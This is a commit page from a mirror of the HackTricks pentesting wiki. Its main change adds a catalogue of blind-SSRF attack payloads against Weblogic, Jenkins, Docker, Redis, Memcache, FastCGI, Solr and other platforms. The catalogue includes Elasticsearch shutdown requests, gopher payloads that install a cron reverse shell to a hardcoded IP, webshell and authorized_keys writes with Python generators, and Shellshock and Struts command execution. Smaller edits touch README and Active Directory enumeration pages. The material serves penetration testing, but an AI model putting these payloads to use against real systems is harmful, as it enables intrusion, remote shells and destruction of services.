Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-15 01:17:36 +00:00
Code Issues Projects Releases Packages Wiki Activity

GitBook: [master] 434 pages and one asset modified

Browse source
This commit is contained in:
CPol 2021-01-29 09:39:25 +00:00 committed by gitbook-bot
parent 9ce3a40c67
commit c06ef56859
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
6 changed files with 666 additions and 29 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

BIN
.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (9).png Normal file
View file

Binary file not shown.
Side by side

After

Width:  |  Height:  |  Size: 1.5 KiB

2
README.md
View file

@ -16,7 +16,7 @@ If you want to **know** about my **latest modifications**/**additions** or you h
**If you want to** share some tricks with the community **you can also submit** pull requests **to** [https://github.com/carlospolop/hacktricks](https://github.com/carlospolop/hacktricks**]%28https://github.com/carlospolop/hacktricks) that will be reflected in this book.
Don't forget to\*\* give ⭐ on the github to motivate me to continue developing this book.
![](.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29%20%284%29%20%283%29.png)
![](.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29%20%284%29%20%284%29.png)
[**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop)

2
linux-unix/linux-privilege-escalation-checklist.md
View file

@ -146,7 +146,7 @@ If you want to **know** about my **latest modifications**/**additions** or you h
If you want to **share some tricks with the community** you can also submit **pull requests** to ****[**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) ****that will be reflected in this book.
Don't forget to **give ⭐ on the github** to motivate me to continue developing this book.
![](../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29%20%284%29%20%285%29.png)
![](../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29%20%284%29%20%286%29.png)
[**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop)\*\*\*\*

639
pentesting-web/ssrf-server-side-request-forgery.md
View file

@ -503,6 +503,645 @@ You can use [https://github.com/teknogeek/ssrf-sheriff](https://github.com/tekno
{% embed url="https://github.com/incredibleindishell/SSRF\_Vulnerable\_Lab" %}
## Vulnerable Platforms
This section was copied from [https://blog.assetnote.io/2021/01/13/blind-ssrf-chains/](https://blog.assetnote.io/2021/01/13/blind-ssrf-chains/)
### Elasticsearch <a id="elasticsearch"></a>
**Commonly bound port: 9200**
When Elasticsearch is deployed internally, it usually does not require authentication.
If you have a partially blind SSRF where you can determine the status code, check to see if the following endpoints return a 200:
```text
/_cluster/health
/_cat/indices
/_cat/health
```
If you have a blind SSRF where you can send POST requests, you can shut down the Elasticsearch instance by sending a POST request to the following path:
Note: the `_shutdown` API has been removed from Elasticsearch version 2.x. and up. This only works in Elasticsearch 1.6 and below:
```text
/_shutdown
/_cluster/nodes/_master/_shutdown
/_cluster/nodes/_shutdown
/_cluster/nodes/_all/_shutdown
```
### Weblogic <a id="weblogic"></a>
**Commonly bound ports: 80, 443 \(SSL\), 7001, 8888**
**SSRF Canary: UDDI Explorer \(CVE-2014-4210\)**
```text
POST /uddiexplorer/SearchPublicRegistries.jsp HTTP/1.1
Host: target.com
Content-Length: 137
Content-Type: application/x-www-form-urlencoded
operator=http%3A%2F%2FSSRF_CANARY&rdoSearch=name&txtSearchname=test&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search
```
This also works via GET:
```text
http://target.com/uddiexplorer/SearchPublicRegistries.jsp?operator=http%3A%2F%2FSSRF_CANARY&rdoSearch=name&txtSearchname=test&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search
```
This endpoint is also vulnerable to CRLF injection:
```text
GET /uddiexplorer/SearchPublicRegistries.jsp?operator=http://attacker.com:4000/exp%20HTTP/1.11%0AX-CLRF%3A%20Injected%0A&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search HTTP/1.0
Host: vuln.weblogic
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36
Connection: close
```
Will result in the following request:
```text
root@mail:~# nc -lvp 4000
Listening on [0.0.0.0] (family 0, port 4000)
Connection from example.com 43111 received!
POST /exp HTTP/1.11
X-CLRF: Injected HTTP/1.1
Content-Type: text/xml; charset=UTF-8
soapAction: ""
Content-Length: 418
User-Agent: Java1.6.0_24
Host: attacker.com:4000
Accept: text/html, image/gif, image/jpeg, */*; q=.2
Connection: Keep-Alive
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><env:Envelope xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:env="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><env:Header/><env:Body><find_business generic="2.0" xmlns="urn:uddi-org:api_v2"><name>sdf</name></find_business></env:Body></env:Envelope>
```
**SSRF Canary: CVE-2020-14883**
Taken from [here](https://forum.90sec.com/t/topic/1412).
Linux:
```text
POST /console/css/%252e%252e%252fconsole.portal HTTP/1.1
Host: vulnerablehost:7001
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 117
_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://SSRF_CANARY/poc.xml")
```
Windows:
```text
POST /console/css/%252e%252e%252fconsole.portal HTTP/1.1
Host: vulnerablehost:7001
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 117
_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.ClassPathXmlApplicationContext("http://SSRF_CANARY/poc.xml")
```
### Hashicorp Consul <a id="hashicorp-consul"></a>
**Commonly bound ports: 8500, 8501 \(SSL\)**
Writeup can be found [here](https://www.kernelpicnic.net/2017/05/29/Pivoting-from-blind-SSRF-to-RCE-with-Hashicorp-Consul.html).
### Shellshock <a id="shellshock"></a>
**Commonly bound ports: 80, 443 \(SSL\), 8080**
In order to effectively test for Shellshock, you may need to add a header containing the payload. The following CGI paths are worth trying:
Short list of CGI paths to test:
[Gist containing paths](https://gist.github.com/infosec-au/009fcbdd5bad16bb6ceb36b838d96be4).
**SSRF Canary: Shellshock via User Agent**
```text
User-Agent: () { foo;}; echo Content-Type: text/plain ; echo ; curl SSRF_CANARY
```
### Apache Druid <a id="apache-druid"></a>
**Commonly bound ports: 80, 8080, 8888, 8082**
See the API reference for Apache Druid [here](https://druid.apache.org/docs/latest/operations/api-reference.html).
If you can view the status code, check the following paths to see if they return a 200 status code:
```text
/status/selfDiscovered/status
/druid/coordinator/v1/leader
/druid/coordinator/v1/metadata/datasources
/druid/indexer/v1/taskStatus
```
Shutdown tasks, requires you to guess task IDs or the datasource name:
```text
/druid/indexer/v1/task/{taskId}/shutdown
/druid/indexer/v1/datasources/{dataSource}/shutdownAllTasks
```
Shutdown supervisors on Apache Druid Overlords:
```text
/druid/indexer/v1/supervisor/terminateAll
/druid/indexer/v1/supervisor/{supervisorId}/shutdown
```
### Apache Solr <a id="apache-solr"></a>
**Commonly bound port: 8983**
**SSRF Canary: Shards Parameter**
Taken from [here](https://github.com/veracode-research/solr-injection).
```text
/search?q=Apple&shards=http://SSRF_CANARY/solr/collection/config%23&stream.body={"set-property":{"xxx":"yyy"}}
/solr/db/select?q=orange&shards=http://SSRF_CANARY/solr/atom&qt=/select?fl=id,name:author&wt=json
/xxx?q=aaa%26shards=http://SSRF_CANARY/solr
/xxx?q=aaa&shards=http://SSRF_CANARY/solr
```
**SSRF Canary: Solr XXE \(2017\)**
[Apache Solr 7.0.1 XXE \(Packetstorm\)](https://packetstormsecurity.com/files/144678/Apache-Solr-7.0.1-XXE-Injection-Code-Execution.html)
```text
/solr/gettingstarted/select?q={!xmlparser v='<!DOCTYPE a SYSTEM "http://SSRF_CANARY/xxx"'><a></a>'
/xxx?q={!type=xmlparser v="<!DOCTYPE a SYSTEM 'http://SSRF_CANARY/solr'><a></a>"}
```
**RCE via dataImportHandler**
[Research on RCE via dataImportHandler](https://github.com/veracode-research/solr-injection#3-cve-2019-0193-remote-code-execution-via-dataimporthandler)
### PeopleSoft <a id="peoplesoft"></a>
**Commonly bound ports: 80,443 \(SSL\)**
Taken from this research [here](https://www.ambionics.io/blog/oracle-peoplesoft-xxe-to-rce).
**SSRF Canary: XXE \#1**
```text
POST /PSIGW/HttpListeningConnector HTTP/1.1
Host: website.com
Content-Type: application/xml
...
<?xml version="1.0"?>
<!DOCTYPE IBRequest [
<!ENTITY x SYSTEM "http://SSRF_CANARY">
]>
<IBRequest>
<ExternalOperationName>&x;</ExternalOperationName>
<OperationType/>
<From><RequestingNode/>
<Password/>
<OrigUser/>
<OrigNode/>
<OrigProcess/>
<OrigTimeStamp/>
</From>
<To>
<FinalDestination/>
<DestinationNode/>
<SubChannel/>
</To>
<ContentSections>
<ContentSection>
<NonRepudiation/>
<MessageVersion/>
<Data><![CDATA[<?xml version="1.0"?>your_message_content]]>
</Data>
</ContentSection>
</ContentSections>
</IBRequest>
```
**SSRF Canary: XXE \#2**
```text
POST /PSIGW/PeopleSoftServiceListeningConnector HTTP/1.1
Host: website.com
Content-Type: application/xml
...
<!DOCTYPE a PUBLIC "-//B/A/EN" "http://SSRF_CANARY">
```
### Apache Struts <a id="apache-struts"></a>
**Commonly bound ports: 80,443 \(SSL\),8080,8443 \(SSL\)**
Taken from [here](https://blog.safebuff.com/2016/07/03/SSRF-Tips/).
**SSRF Canary: Struts2-016**:
Append this to the end of every internal endpoint/URL you know of:
```text
?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'command'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23t%3d%23d.readLine(),%23u%3d"http://SSRF_CANARY/result%3d".concat(%23t),%23http%3dnew%20java.net.URL(%23u).openConnection(),%23http.setRequestMethod("GET"),%23http.connect(),%23http.getInputStream()}
```
### JBoss <a id="jboss"></a>
**Commonly bound ports: 80,443 \(SSL\),8080,8443 \(SSL\)**
Taken from [here](https://blog.safebuff.com/2016/07/03/SSRF-Tips/).
**SSRF Canary: Deploy WAR from URL**
```text
/jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.system:service=MainDeployer&methodIndex=17&arg0=http://SSRF_CANARY/utils/cmd.war
```
### Confluence <a id="confluence"></a>
**Commonly bound ports: 80,443 \(SSL\),8080,8443 \(SSL\)**
**SSRF Canary: Sharelinks \(Confluence versions released from 2016 November and older\)**
```text
/rest/sharelinks/1.0/link?url=https://SSRF_CANARY/
```
**SSRF Canary: iconUriServlet - Confluence &lt; 6.1.3 \(CVE-2017-9506\)**
[Atlassian Security Ticket OAUTH-344](https://ecosystem.atlassian.net/browse/OAUTH-344)
```text
/plugins/servlet/oauth/users/icon-uri?consumerUri=http://SSRF_CANARY
```
### Jira <a id="jira"></a>
**Commonly bound ports: 80,443 \(SSL\),8080,8443 \(SSL\)**
**SSRF Canary: iconUriServlet - Jira &lt; 7.3.5 \(CVE-2017-9506\)**
[Atlassian Security Ticket OAUTH-344](https://ecosystem.atlassian.net/browse/OAUTH-344)
```text
/plugins/servlet/oauth/users/icon-uri?consumerUri=http://SSRF_CANARY
```
**SSRF Canary: makeRequest - Jira &lt; 8.4.0 \(CVE-2019-8451\)**
[Atlassian Security Ticket JRASERVER-69793](https://jira.atlassian.com/browse/JRASERVER-69793)
```text
/plugins/servlet/gadgets/makeRequest?url=https://SSRF_CANARY:443@example.com
```
### Other Atlassian Products <a id="other-atlassian-products"></a>
**Commonly bound ports: 80,443 \(SSL\),8080,8443 \(SSL\)**
**SSRF Canary: iconUriServlet \(CVE-2017-9506\)**:
* Bamboo &lt; 6.0.0
* Bitbucket &lt; 4.14.4
* Crowd &lt; 2.11.2
* Crucible &lt; 4.3.2
* Fisheye &lt; 4.3.2
[Atlassian Security Ticket OAUTH-344](https://ecosystem.atlassian.net/browse/OAUTH-344)
```text
/plugins/servlet/oauth/users/icon-uri?consumerUri=http://SSRF_CANARY
```
### OpenTSDB <a id="opentsdb"></a>
**Commonly bound port: 4242**
[OpenTSDB Remote Code Execution](https://packetstormsecurity.com/files/136753/OpenTSDB-Remote-Code-Execution.html)
**SSRF Canary: curl via RCE**
```text
/q?start=2016/04/13-10:21:00&ignore=2&m=sum:jmxdata.cpu&o=&yrange=[0:]&key=out%20right%20top&wxh=1900x770%60curl%20SSRF_CANARY%60&style=linespoint&png
```
### Jenkins <a id="jenkins"></a>
**Commonly bound ports: 80,443 \(SSL\),8080,8888**
Great writeup [here](https://blog.orange.tw/2019/01/hacking-jenkins-part-1-play-with-dynamic-routing.html).
**SSRF Canary: CVE-2018-1000600**
```text
/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword?apiUrl=http://SSRF_CANARY/%23&login=orange&password=tsai
```
**RCE**
Follow the instructions here to achieve RCE via GET: [Hacking Jenkins Part 2 - Abusing Meta Programming for Unauthenticated RCE!](https://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html)
```text
/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name='orange.tw', root='http://SSRF_CANARY/')%0a@Grab(group='tw.orange', module='poc', version='1')%0aimport Orange;
```
**RCE via Groovy**
```bash
cmd = 'curl burp_collab'
pay = 'public class x {public x(){"%s".execute()}}' % cmd
data = 'http://jenkins.internal/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=' + urllib.quote(pay)
```
### Hystrix Dashboard <a id="hystrix-dashboard"></a>
**Commonly bound ports: 80,443 \(SSL\),8080**
Spring Cloud Netflix, versions 2.2.x prior to 2.2.4, versions 2.1.x prior to 2.1.6.
**SSRF Canary: CVE-2020-5412**
```text
/proxy.stream?origin=http://SSRF_CANARY/
```
### W3 Total Cache <a id="w3-total-cache"></a>
**Commonly bound ports: 80,443 \(SSL\)**
W3 Total Cache 0.9.2.6-0.9.3
**SSRF Canary: CVE-2019-6715**
This needs to be a PUT request:
```text
PUT /wp-content/plugins/w3-total-cache/pub/sns.php HTTP/1.1
Host:
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.80 Safari/537.36
Content-Length: 124
Content-Type: application/x-www-form-urlencoded
Connection: close
{"Type":"SubscriptionConfirmation","Message":"","SubscribeURL":"https://SSRF_CANARY"}
```
**SSRF Canary**
The advisory for this vulnerability was released here: [W3 Total Cache SSRF vulnerability](https://klikki.fi/adv/w3_total_cache.html)
This PHP code will generate a payload for your SSRF Canary host \(replace `url` with your canary host\):
```php
<?php
$url='http://www.google.com';
$file=strtr(base64_encode(gzdeflate($url.'#https://ajax.googleapis.com')), '+/=', '-_');
$file=chop($file,'=');
$req='/wp-content/plugins/w3-total-cache/pub/minify.php?file='.$file.'.css';
echo($req);
?>
```
### Docker <a id="docker"></a>
**Commonly bound ports: 2375, 2376 \(SSL\)**
If you have a partially blind SSRF, you can use the following paths to verify the presence of Dockers API:
```text
/containers/json
/secrets
/services
```
**RCE via running an arbitrary docker image**
```text
POST /containers/create?name=test HTTP/1.1
Host: website.com
Content-Type: application/json
...
{"Image":"alpine", "Cmd":["/usr/bin/tail", "-f", "1234", "/dev/null"], "Binds": [ "/:/mnt" ], "Privileged": true}
```
Replace alpine with an arbitrary image you would like the docker container to run.
### Gitlab Prometheus Redis Exporter <a id="gitlab-prometheus-redis-exporter"></a>
**Commonly bound ports: 9121**
This vulnerability affects Gitlab instances before version 13.1.1. According to the [Gitlab documentation](https://docs.gitlab.com/ee/administration/monitoring/prometheus/#configuring-prometheus) `Prometheus and its exporters are on by default, starting with GitLab 9.0.`
These exporters provide an excellent method for an attacker to pivot and attack other services using CVE-2020-13379. One of the exporters which is easily exploited is the Redis Exporter.
The following endpoint will allow an attacker to dump all the keys in the redis server provided via the target parameter:
```text
http://localhost:9121/scrape?target=redis://127.0.0.1:7001&check-keys=*
```
**Possible via Gopher**
### Redis <a id="redis"></a>
**Commonly bound port: 6379**
Recommended reading:
* [Trying to hack Redis via HTTP requests](https://www.agarri.fr/blog/archives/2014/09/11/trying_to_hack_redis_via_http_requests/index.html)
* [SSRF Exploits against Redis](https://maxchadwick.xyz/blog/ssrf-exploits-against-redis)
**RCE via Cron** - [Gopher Attack Surfaces](https://blog.chaitin.cn/gopher-attack-surfaces/)
```bash
redis-cli -h $1 flushall
echo -e "\n\n*/1 * * * * bash -i >& /dev/tcp/172.19.23.228/2333 0>&1\n\n"|redis-cli -h $1 -x set 1
redis-cli -h $1 config set dir /var/spool/cron/
redis-cli -h $1 config set dbfilename root
redis-cli -h $1 save
```
Gopher:
```text
gopher://127.0.0.1:6379/_*1%0d%0a$8%0d%0aflushall%0d%0a*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$64%0d%0a%0d%0a%0a%0a*/1 * * * * bash -i >& /dev/tcp/172.19.23.228/2333 0>&1%0a%0a%0a%0a%0a%0d%0a%0d%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/spool/cron/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0aquit%0d%0a
```
**RCE via Shell Upload \(PHP\)** - [Redis Getshell Summary](https://www.mdeditor.tw/pl/pBy0)
```python
#!/usr/bin/env python
# -*-coding:utf-8-*-
import urllib
protocol="gopher://"
ip="192.168.189.208"
port="6379"
shell="\n\n<?php phpinfo();?>\n\n"
filename="shell.php"
path="/var"
passwd=""
cmd=["flushall",
"set 1 {}".format(shell.replace(" ","${IFS}")),
"config set dir {}".format(path),
"config set dbfilename {}".format(filename),
"save"
]
if passwd:
cmd.insert(0,"AUTH {}".format(passwd))
payload=protocol+ip+":"+port+"/_"
def redis_format(arr):
CRLF="\r\n"
redis_arr = arr.split(" ")
cmd=""
cmd+="*"+str(len(redis_arr))
for x in redis_arr:
cmd+=CRLF+"$"+str(len((x.replace("${IFS}"," "))))+CRLF+x.replace("${IFS}"," ")
cmd+=CRLF
return cmd
if __name__=="__main__":
for x in cmd:
payload += urllib.quote(redis_format(x))
print payload
```
**RCE via authorized\_keys** - [Redis Getshell Summary](https://www.mdeditor.tw/pl/pBy0)
```python
import urllib
protocol="gopher://"
ip="192.168.189.208"
port="6379"
# shell="\n\n<?php eval($_GET[\"cmd\"]);?>\n\n"
sshpublic_key = "\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC8IOnJUAt5b/5jDwBDYJTDULjzaqBe2KW3KhqlaY58XveKQRBLrG3ZV0ffPnIW5SLdueunb4HoFKDQ/KPXFzyvVjqByj5688THkq1RJkYxGlgFNgMoPN151zpZ+eCBdFZEf/m8yIb3/7Cp+31s6Q/DvIFif6IjmVRfWXhnkjNehYjsp4gIEBiiW/jWId5yrO9+AwAX4xSabbxuUyu02AQz8wp+h8DZS9itA9m7FyJw8gCrKLEnM7PK/ClEBevDPSR+0YvvYtnUxeCosqp9VrjTfo5q0nNg9JAvPMs+EA1ohUct9UyXbTehr1Bdv4IXx9+7Vhf4/qwle8HKali3feIZ root@kali\n\n"
filename="authorized_keys"
path="/root/.ssh/"
passwd=""
cmd=["flushall",
"set 1 {}".format(sshpublic_key.replace(" ","${IFS}")),
"config set dir {}".format(path),
"config set dbfilename {}".format(filename),
"save"
]
if passwd:
cmd.insert(0,"AUTH {}".format(passwd))
payload=protocol+ip+":"+port+"/_"
def redis_format(arr):
CRLF="\r\n"
redis_arr = arr.split(" ")
cmd=""
cmd+="*"+str(len(redis_arr))
for x in redis_arr:
cmd+=CRLF+"$"+str(len((x.replace("${IFS}"," "))))+CRLF+x.replace("${IFS}"," ")
cmd+=CRLF
return cmd
if __name__=="__main__":
for x in cmd:
payload += urllib.quote(redis_format(x))
print payload
```
**RCE on GitLab via Git protocol**
Great writeup from Liveoverflow [here](https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/).
While this required authenticated access to GitLab to exploit, I am including the payload here as the `git` protocol may work on the target you are hacking. This payload is for reference.
```text
git://[0:0:0:0:0:ffff:127.0.0.1]:6379/%0D%0A%20multi%0D%0A%20sadd%20resque%3Agitlab%3Aqueues%20system%5Fhook%5Fpush%0D%0A%20lpush%20resque%3Agitlab%3Aqueue%3Asystem%5Fhook%5Fpush%20%22%7B%5C%22class%5C%22%3A%5C%22GitlabShellWorker%5C%22%2C%5C%22args%5C%22%3A%5B%5C%22class%5Feval%5C%22%2C%5C%22open%28%5C%27%7Ccat%20%2Fflag%20%7C%20nc%20127%2E0%2E0%2E1%202222%5C%27%29%2Eread%5C%22%5D%2C%5C%22retry%5C%22%3A3%2C%5C%22queue%5C%22%3A%5C%22system%5Fhook%5Fpush%5C%22%2C%5C%22jid%5C%22%3A%5C%22ad52abc5641173e217eb2e52%5C%22%2C%5C%22created%5Fat%5C%22%3A1513714403%2E8122594%2C%5C%22enqueued%5Fat%5C%22%3A1513714403%2E8129568%7D%22%0D%0A%20exec%0D%0A%20exec%0D%0A/ssrf123321.git
```
### Memcache <a id="memcache"></a>
**Commonly bound port: 11211**
* [vBulletin Memcache RCE](https://www.exploit-db.com/exploits/37815)
* [GitHub Enterprise Memcache RCE](https://www.exploit-db.com/exploits/42392)
* [Example Gopher payload for Memcache](https://blog.safebuff.com/2016/07/03/SSRF-Tips/#SSRF-memcache-Getshell)
```bash
gopher://[target ip]:11211/_%0d%0aset ssrftest 1 0 147%0d%0aa:2:{s:6:"output";a:1:{s:4:"preg";a:2:{s:6:"search";s:5:"/.*/e";s:7:"replace";s:33:"eval(base64_decode($_POST[ccc]));";}}s:13:"rewritestatus";i:1;}%0d%0a
gopher://192.168.10.12:11211/_%0d%0adelete ssrftest%0d%0a
```
### Apache Tomcat <a id="apache-tomcat"></a>
**Commonly bound ports: 80,443 \(SSL\),8080,8443 \(SSL\)**
Effective against Tomcat 6 only:
[gopher-tomcat-deployer](https://github.com/pimps/gopher-tomcat-deployer)
CTF writeup using this technique:
[From XXE to RCE: Pwn2Win CTF 2018 Writeup](https://bookgin.tw/2018/12/04/from-xxe-to-rce-pwn2win-ctf-2018-writeup/)
### FastCGI <a id="fastcgi"></a>
**Commonly bound ports: 80,443 \(SSL\)**
This was taken from [here](https://blog.chaitin.cn/gopher-attack-surfaces/).
```bash
gopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%10%00%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%02CONTENT_LENGTH97%0E%04REQUEST_METHODPOST%09%5BPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Asafe_mode%20%3D%20Off%0Aauto_prepend_file%20%3D%20php%3A//input%0F%13SCRIPT_FILENAME/var/www/html/1.php%0D%01DOCUMENT_ROOT/%01%04%00%01%00%00%00%00%01%05%00%01%00a%07%00%3C%3Fphp%20system%28%27bash%20-i%20%3E%26%20/dev/tcp/172.19.23.228/2333%200%3E%261%27%29%3Bdie%28%27-----0vcdb34oju09b8fd-----%0A%27%29%3B%3F%3E%00%00%00%00%00%00%00
```
**Tools**
### Gopherus <a id="gopherus"></a>
* [Gopherus - Github](https://github.com/tarunkant/Gopherus)
* [Blog post on Gopherus](https://spyclub.tech/2018/08/14/2018-08-14-blog-on-gopherus/)
This tool generates Gopher payloads for:
* MySQL
* PostgreSQL
* FastCGI
* Redis
* Zabbix
* Memcache
### SSRF Proxy <a id="ssrf-proxy"></a>
* [SSRF Proxy](https://github.com/bcoles/ssrf_proxy)
SSRF Proxy is a multi-threaded HTTP proxy server designed to tunnel client HTTP traffic through HTTP servers vulnerable to Server-Side Request Forgery \(SSRF\).
## References
* [https://medium.com/@pravinponnusamy/ssrf-payloads-f09b2a86a8b4](https://medium.com/@pravinponnusamy/ssrf-payloads-f09b2a86a8b4)

50
windows/active-directory-methodology/README.md
View file

@ -1,8 +1,8 @@
# Active Directory Methodology
If you want to **know** about my **latest modifications**/**additions** or you have **any suggestion for HackTricks or PEASS**, ****join the [💬](https://emojipedia.org/speech-balloon/) ****[**PEASS & HackTricks telegram group here**](https://t.me/peass), or **follow me on Twitter** [🐦](https://emojipedia.org/bird/)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
If you want to **share some tricks with the community** you can also submit **pull requests** to ****[**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) ****that will be reflected in this book.
Don't forget to **give ⭐ on the github** to motivate me to continue developing this book.
If you want to **know** about my **latest modifications**/**additions** or you have **any suggestion for HackTricks or PEASS**, **join the** [**💬**](https://emojipedia.org/speech-balloon/) ****[**PEASS & HackTricks telegram group here**](https://t.me/peass), or **follow me on Twitter** [🐦](https://emojipedia.org/bird/)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
If you want to **share some tricks with the community** you can also submit **pull requests** to **\*\*\[**[https://github.com/carlospolop/hacktricks\*\*\]\(https://github.com/carlospolop/hacktricks](https://github.com/carlospolop/hacktricks**]%28https://github.com/carlospolop/hacktricks)\) **\*\*that will be reflected in this book.
Don't forget to** give ⭐ on the github\*\* to motivate me to continue developing this book.
## Basic overview
@ -43,7 +43,7 @@ You can take a lot to [https://wadcoms.github.io/](https://wadcoms.github.io/) t
If you just have access to an AD environment but you don't have any credentials/sessions you could:
* **Pentest the network:** Scan the network, find machines and open ports and try to **exploit vulnerabilities** or **extract credentials** from them \(for example, ****[**printers could be very interesting targets**](ad-information-in-printers.md)\). Take a look to the General ****[**Pentesting Methodology**](../../pentesting-methodology.md) ****to find more information about how to do this.
* **Pentest the network:** Scan the network, find machines and open ports and try to **exploit vulnerabilities** or **extract credentials** from them \(for example, **\*\*\[**printers could be very interesting targets**\]\(ad-information-in-printers.md\)\). Take a look to the General \*\***[**Pentesting Methodology**](../../pentesting-methodology.md) _\*\*_to find more information about how to do this.
* **Check for null and Guest access on smb services** \(this won't work on modern Windows versions\):
* `enum4linux -a -u "" -p "" <DC IP> && enum4linux -a -u "guest" -p "" <DC IP>`
* `smbmap -u "" -p "" -P 445 -H <DC IP> && smbmap -u "guest" -p "" -P 445 -H <DC IP>`
@ -54,7 +54,7 @@ If you just have access to an AD environment but you don't have any credentials/
* [**A more detailed guide on how to enumerate LDAP can be found here.**](../../pentesting/pentesting-ldap.md)\*\*\*\*
* **Poison the network**
* Gather credentials [**impersonating services with Responder**](../../pentesting/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)\*\*\*\*
* Access host by ****[**abusing the relay attack**](../../pentesting/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md#relay-attack)**.**
* Access host by **\*\*\[**abusing the relay attack**\]\(../../pentesting/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md\#relay-attack\)**.\*\*
* Gather credentials **exposing** [**fake UPnP services with evil-S**](../../pentesting/pentesting-network/spoofing-ssdp-and-upnp-devices.md)\*\*\*\*[**SDP**](https://medium.com/@nickvangilder/exploiting-multifunction-printers-during-a-penetration-test-engagement-28d3840d8856)\*\*\*\*
* **OSINT**: Try to **extract possible usernames** from services \(mainly web\) inside the domain environments and also from the publicly available web pages of the company. If you find the complete names of company workers, you could try different AD **username conventions \(**[**read this**](https://activedirectorypro.com/active-directory-user-naming-convention/)**\)**. The most common conventions are: _NameSurname_, _Name.Surname_, _NamSur_ \(3letters of each\), _Nam.Sur_, _NSurname_, _N.Surname_, _SurnameName_, _Surname.Name_, _SurnameN_, _Surname.N_, 3 _random letters and 3 random numbers_ \(abc123\). You could also try **statistically most used usernames**: [https://github.com/insidetrust/statistically-likely-usernames](https://github.com/insidetrust/statistically-likely-usernames) **Read the following Username enumeration section to learn how to find if a username is valid or not.**
